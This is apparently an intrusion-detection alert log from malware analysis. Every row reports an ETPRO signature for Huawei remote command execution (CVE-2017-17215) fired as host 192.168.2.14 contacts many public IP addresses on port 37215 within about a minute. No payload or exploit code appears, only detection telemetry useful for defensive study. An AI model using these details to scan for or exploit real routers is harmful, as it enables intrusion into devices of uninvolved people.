                                                        06/13/24-21:32:05.371178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924437215192.168.2.14197.25.148.129
                                                        06/13/24-21:32:23.830956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3436837215192.168.2.1441.134.87.77
                                                        06/13/24-21:32:32.169845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396037215192.168.2.14197.122.102.37
                                                        06/13/24-21:33:13.212250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5472837215192.168.2.1441.48.92.180
                                                        06/13/24-21:32:17.697163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215237215192.168.2.1441.77.203.117
                                                        06/13/24-21:32:36.266736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4661237215192.168.2.1441.202.115.117
                                                        06/13/24-21:33:07.055747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382037215192.168.2.14197.27.130.138
                                                        06/13/24-21:32:23.836359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891437215192.168.2.14197.97.8.18
                                                        06/13/24-21:32:58.824249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6001837215192.168.2.14197.184.33.158
                                                        06/13/24-21:32:13.567425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099037215192.168.2.14197.228.237.235
                                                        06/13/24-21:33:07.041250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291437215192.168.2.14197.251.181.165
                                                        06/13/24-21:32:42.405545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939037215192.168.2.14197.210.237.14
                                                        06/13/24-21:32:34.195106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193637215192.168.2.14197.116.79.111
                                                        06/13/24-21:33:04.993673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5280037215192.168.2.14156.121.131.221
                                                        06/13/24-21:32:36.263888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5180037215192.168.2.14156.155.107.99
                                                        06/13/24-21:32:32.168829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3386437215192.168.2.14156.93.2.151
                                                        06/13/24-21:32:34.215838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4415037215192.168.2.14156.28.49.186
                                                        06/13/24-21:32:13.544921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345437215192.168.2.14197.2.71.113
                                                        06/13/24-21:32:15.632941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4483637215192.168.2.14156.189.139.242
                                                        06/13/24-21:32:36.263248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393637215192.168.2.14156.17.212.224
                                                        06/13/24-21:32:52.660522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559437215192.168.2.1441.203.154.211
                                                        06/13/24-21:32:15.608383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3894837215192.168.2.14197.145.29.42
                                                        06/13/24-21:32:44.480148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4929437215192.168.2.14197.211.0.140
                                                        06/13/24-21:32:11.506697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219837215192.168.2.1441.44.73.217
                                                        06/13/24-21:32:23.834492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064237215192.168.2.14197.103.91.172
                                                        06/13/24-21:32:28.045128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947037215192.168.2.1441.201.254.139
                                                        06/13/24-21:33:15.276970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5993637215192.168.2.14156.96.196.96
                                                        06/13/24-21:32:58.824272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079637215192.168.2.14197.106.42.22
                                                        06/13/24-21:32:07.403885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3382437215192.168.2.14156.28.199.217
                                                        06/13/24-21:33:11.180526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969637215192.168.2.14197.241.25.118
                                                        06/13/24-21:32:17.694394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6032437215192.168.2.14197.135.177.52
                                                        06/13/24-21:32:30.075279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3409037215192.168.2.1441.74.174.216
                                                        06/13/24-21:32:07.416939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4771237215192.168.2.1441.238.95.131
                                                        06/13/24-21:32:54.709982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817637215192.168.2.14156.234.27.221
                                                        06/13/24-21:33:09.087130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4206037215192.168.2.1441.142.180.214
                                                        06/13/24-21:32:11.508263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249237215192.168.2.1441.165.26.194
                                                        06/13/24-21:32:38.320670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751637215192.168.2.14156.124.73.42
                                                        06/13/24-21:32:07.402784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836037215192.168.2.14197.20.17.61
                                                        06/13/24-21:32:54.707972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759237215192.168.2.1441.140.60.29
                                                        06/13/24-21:32:23.941449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619837215192.168.2.1441.240.11.71
                                                        06/13/24-21:33:09.126729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901437215192.168.2.14197.172.176.152
                                                        06/13/24-21:32:32.151809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3611437215192.168.2.14156.41.144.249
                                                        06/13/24-21:32:28.029006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4663437215192.168.2.14156.153.74.102
                                                        06/13/24-21:32:56.788828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5845237215192.168.2.14156.101.88.88
                                                        06/13/24-21:32:36.266676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4057237215192.168.2.14197.60.113.72
                                                        06/13/24-21:33:11.175359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883837215192.168.2.1441.96.59.112
                                                        06/13/24-21:32:54.707421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6063437215192.168.2.1441.77.216.1
                                                        06/13/24-21:32:09.456310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216637215192.168.2.1441.17.135.84
                                                        06/13/24-21:32:07.403315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3645437215192.168.2.14156.146.74.235
                                                        06/13/24-21:32:13.568897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3707637215192.168.2.14197.103.61.210
                                                        06/13/24-21:33:13.212494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041637215192.168.2.14156.92.37.142
                                                        06/13/24-21:32:13.565641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973837215192.168.2.14156.118.239.80
                                                        06/13/24-21:33:02.912958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026637215192.168.2.14156.158.145.108
                                                        06/13/24-21:33:13.214659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672637215192.168.2.1441.171.230.135
                                                        06/13/24-21:32:23.932606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5796237215192.168.2.14156.87.82.62
                                                        06/13/24-21:32:32.170307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5712237215192.168.2.14156.36.252.162
                                                        06/13/24-21:33:07.043031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967237215192.168.2.14156.241.84.121
                                                        06/13/24-21:32:01.221890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4814237215192.168.2.14156.230.84.227
                                                        06/13/24-21:32:21.786622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285037215192.168.2.14197.162.77.156
                                                        06/13/24-21:32:46.526290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061237215192.168.2.14156.48.220.51
                                                        06/13/24-21:32:25.994577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259637215192.168.2.1441.19.136.102
                                                        06/13/24-21:32:15.632368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4591837215192.168.2.14197.21.236.225
                                                        06/13/24-21:32:48.567810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872237215192.168.2.1441.166.223.20
                                                        06/13/24-21:32:09.438035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5606037215192.168.2.1441.94.3.79
                                                        06/13/24-21:32:11.506641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5692237215192.168.2.14197.16.242.233
                                                        06/13/24-21:32:36.269646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3778837215192.168.2.14156.206.112.238
                                                        06/13/24-21:32:56.756804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809237215192.168.2.1441.81.108.25
                                                        06/13/24-21:31:57.136474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959837215192.168.2.14156.70.232.219
                                                        06/13/24-21:32:36.248212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5363837215192.168.2.14156.155.92.189
                                                        06/13/24-21:32:48.556275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104237215192.168.2.14197.177.16.206
                                                        06/13/24-21:32:52.656549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356037215192.168.2.14156.234.25.118
                                                        06/13/24-21:32:50.631743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5409837215192.168.2.14156.110.70.79
                                                        06/13/24-21:32:30.126009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367037215192.168.2.14197.154.92.217
                                                        06/13/24-21:32:56.758752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405437215192.168.2.14197.24.41.55
                                                        06/13/24-21:32:58.842095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620437215192.168.2.1441.121.59.225
                                                        06/13/24-21:32:23.834688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4878637215192.168.2.1441.124.21.189
                                                        06/13/24-21:32:19.728920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5911237215192.168.2.14156.73.84.164
                                                        06/13/24-21:33:09.108096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5551237215192.168.2.14197.200.140.60
                                                        06/13/24-21:32:48.555062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354037215192.168.2.14156.28.255.53
                                                        06/13/24-21:32:58.840985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804437215192.168.2.14197.43.141.216
                                                        06/13/24-21:32:42.408738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393437215192.168.2.14156.186.238.249
                                                        06/13/24-21:31:59.196806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4365037215192.168.2.14156.247.65.190
                                                        06/13/24-21:32:13.546481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453637215192.168.2.14156.178.232.120
                                                        06/13/24-21:32:23.836302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3910237215192.168.2.14156.219.163.144
                                                        06/13/24-21:32:25.993785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4086237215192.168.2.14156.41.154.31
                                                        06/13/24-21:32:48.571918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067237215192.168.2.1441.2.164.150
                                                        06/13/24-21:32:17.695523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5391237215192.168.2.1441.102.220.152
                                                        06/13/24-21:32:28.026167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5696237215192.168.2.14156.220.252.24
                                                        06/13/24-21:33:17.339707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6094437215192.168.2.1441.7.88.18
                                                        06/13/24-21:32:15.605886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5706837215192.168.2.14156.207.65.229
                                                        06/13/24-21:32:52.655698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4707437215192.168.2.1441.38.114.17
                                                        06/13/24-21:32:01.220493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4138237215192.168.2.14197.79.242.20
                                                        06/13/24-21:32:05.345186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5127637215192.168.2.14197.223.83.161
                                                        06/13/24-21:33:17.304047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479437215192.168.2.14197.212.172.75
                                                        06/13/24-21:32:44.453454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5363637215192.168.2.1441.104.122.149
                                                        06/13/24-21:32:15.629173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845037215192.168.2.14197.238.34.104
                                                        06/13/24-21:32:01.222891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5122437215192.168.2.14197.57.102.78
                                                        06/13/24-21:32:50.613523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3993237215192.168.2.14197.119.185.166
                                                        06/13/24-21:33:02.909762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4837437215192.168.2.14156.117.172.28
                                                        06/13/24-21:32:03.276089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163437215192.168.2.1441.221.110.141
                                                        06/13/24-21:32:40.359846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032237215192.168.2.14156.105.99.132
                                                        06/13/24-21:33:15.252742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287837215192.168.2.14156.155.125.117
                                                        06/13/24-21:32:54.708541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131437215192.168.2.14197.138.152.48
                                                        06/13/24-21:32:03.274331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6094237215192.168.2.14197.133.27.79
                                                        06/13/24-21:32:01.223429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4989637215192.168.2.14156.10.72.236
                                                        06/13/24-21:32:52.660072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038237215192.168.2.1441.150.223.241
                                                        06/13/24-21:33:00.887902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480837215192.168.2.14156.11.132.171
                                                        06/13/24-21:32:15.609145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441437215192.168.2.1441.16.5.54
                                                        06/13/24-21:32:54.726152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570437215192.168.2.14197.118.56.240
                                                        06/13/24-21:33:00.886422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084037215192.168.2.14197.140.131.134
                                                        06/13/24-21:33:09.128007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999637215192.168.2.14197.217.116.107
                                                        06/13/24-21:32:07.417987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4785837215192.168.2.1441.218.188.114
                                                        06/13/24-21:33:09.128340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276437215192.168.2.14197.237.222.71
                                                        06/13/24-21:33:13.229592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4013437215192.168.2.14197.160.55.197
                                                        06/13/24-21:33:09.086088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923037215192.168.2.14197.92.113.75
                                                        06/13/24-21:32:28.048039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3858237215192.168.2.1441.254.144.180
                                                        06/13/24-21:33:11.157406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735637215192.168.2.14197.74.49.85
                                                        06/13/24-21:32:50.617477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201037215192.168.2.14156.78.119.87
                                                        06/13/24-21:33:11.173948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5242637215192.168.2.14156.85.88.77
                                                        06/13/24-21:32:28.044493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692837215192.168.2.14156.220.160.20
                                                        06/13/24-21:32:38.316191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5232237215192.168.2.14156.138.190.243
                                                        06/13/24-21:32:48.555666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829637215192.168.2.1441.223.123.204
                                                        06/13/24-21:32:11.506506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4321837215192.168.2.14156.62.69.251
                                                        06/13/24-21:33:15.259554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063037215192.168.2.14156.29.147.157
                                                        06/13/24-21:32:11.484687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158637215192.168.2.14156.143.140.200
                                                        06/13/24-21:32:30.093924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4103237215192.168.2.1441.0.68.137
                                                        06/13/24-21:32:05.346877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4136437215192.168.2.14156.175.57.55
                                                        06/13/24-21:32:21.780209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3643037215192.168.2.1441.15.232.209
                                                        06/13/24-21:33:05.016215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291037215192.168.2.14197.53.222.143
                                                        06/13/24-21:32:13.546332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5353437215192.168.2.14197.224.205.40
                                                        06/13/24-21:32:54.707559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085037215192.168.2.14197.216.254.15
                                                        06/13/24-21:32:58.841887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511837215192.168.2.14197.13.89.57
                                                        06/13/24-21:32:03.295101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227237215192.168.2.14197.13.47.35
                                                        06/13/24-21:32:48.567371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941637215192.168.2.14156.144.118.209
                                                        06/13/24-21:32:32.168478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543637215192.168.2.14197.200.115.62
                                                        06/13/24-21:32:28.028540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284637215192.168.2.14156.217.123.109
                                                        06/13/24-21:33:13.213046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377837215192.168.2.1441.74.162.246
                                                        06/13/24-21:32:38.317763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259437215192.168.2.14197.220.72.141
                                                        06/13/24-21:32:58.824867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018037215192.168.2.1441.99.214.229
                                                        06/13/24-21:32:40.372050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616037215192.168.2.1441.255.127.186
                                                        06/13/24-21:32:48.568053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695637215192.168.2.14156.140.179.36
                                                        06/13/24-21:33:07.060827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794637215192.168.2.14197.63.161.107
                                                        06/13/24-21:32:01.218533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115037215192.168.2.14156.20.102.181
                                                        06/13/24-21:32:15.611188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3563837215192.168.2.14156.168.88.102
                                                        06/13/24-21:32:23.934174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509037215192.168.2.14156.167.170.211
                                                        06/13/24-21:32:28.026363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360837215192.168.2.1441.33.21.160
                                                        06/13/24-21:32:48.556086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265637215192.168.2.1441.179.116.135
                                                        06/13/24-21:32:38.316705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618637215192.168.2.1441.190.220.213
                                                        06/13/24-21:32:54.708072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4338437215192.168.2.1441.157.164.132
                                                        06/13/24-21:32:54.708960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500637215192.168.2.1441.86.247.107
                                                        06/13/24-21:32:28.023887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746037215192.168.2.14197.9.149.21
                                                        06/13/24-21:32:36.244864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3535837215192.168.2.14197.91.205.100
                                                        06/13/24-21:32:13.545930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596637215192.168.2.14197.45.244.46
                                                        06/13/24-21:33:04.987716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4902437215192.168.2.14197.31.115.252
                                                        06/13/24-21:32:19.749527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865237215192.168.2.1441.59.65.162
                                                        06/13/24-21:32:01.240294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543037215192.168.2.14197.191.248.144
                                                        06/13/24-21:32:03.275343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941237215192.168.2.1441.73.171.212
                                                        06/13/24-21:32:13.546312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3912237215192.168.2.14156.107.9.169
                                                        06/13/24-21:32:09.458838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641037215192.168.2.14197.45.49.209
                                                        06/13/24-21:32:15.608327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4525837215192.168.2.1441.92.47.34
                                                        06/13/24-21:32:28.026660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406637215192.168.2.14197.76.172.27
                                                        06/13/24-21:32:38.318291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870437215192.168.2.14197.244.68.243
                                                        06/13/24-21:32:34.198334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235837215192.168.2.14156.254.210.123
                                                        06/13/24-21:32:30.075891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5190437215192.168.2.1441.181.157.215
                                                        06/13/24-21:31:57.093531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716037215192.168.2.1441.24.86.92
                                                        06/13/24-21:32:13.566778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125437215192.168.2.14156.135.156.221
                                                        06/13/24-21:33:02.938121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690837215192.168.2.14197.8.85.40
                                                        06/13/24-21:33:11.158078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6079837215192.168.2.14197.94.173.113
                                                        06/13/24-21:33:00.870613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3508637215192.168.2.14156.126.109.114
                                                        06/13/24-21:32:01.220078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4066437215192.168.2.1441.253.1.253
                                                        06/13/24-21:32:01.240734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4677237215192.168.2.14197.8.66.15
                                                        06/13/24-21:32:05.345770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4620437215192.168.2.1441.32.160.216
                                                        06/13/24-21:32:21.786529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332437215192.168.2.14197.70.230.201
                                                        06/13/24-21:32:30.075673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4762837215192.168.2.1441.67.67.97
                                                        06/13/24-21:33:13.211903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110837215192.168.2.14197.108.164.168
                                                        06/13/24-21:33:11.161007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397837215192.168.2.1441.174.70.98
                                                        06/13/24-21:32:09.458535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5965837215192.168.2.1441.93.237.34
                                                        06/13/24-21:32:58.821928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335037215192.168.2.1441.103.195.64
                                                        06/13/24-21:32:32.167983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5637237215192.168.2.1441.158.112.214
                                                        06/13/24-21:32:05.343699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5936037215192.168.2.14197.75.75.86
                                                        06/13/24-21:32:48.550215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080237215192.168.2.14156.36.35.96
                                                        06/13/24-21:32:48.572155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910237215192.168.2.14197.158.161.15
                                                        06/13/24-21:32:11.507566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3929037215192.168.2.14156.129.69.142
                                                        06/13/24-21:32:38.323857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531437215192.168.2.14197.203.220.190
                                                        06/13/24-21:32:48.554712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5696237215192.168.2.14197.172.178.63
                                                        06/13/24-21:32:50.632595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694637215192.168.2.14156.58.61.39
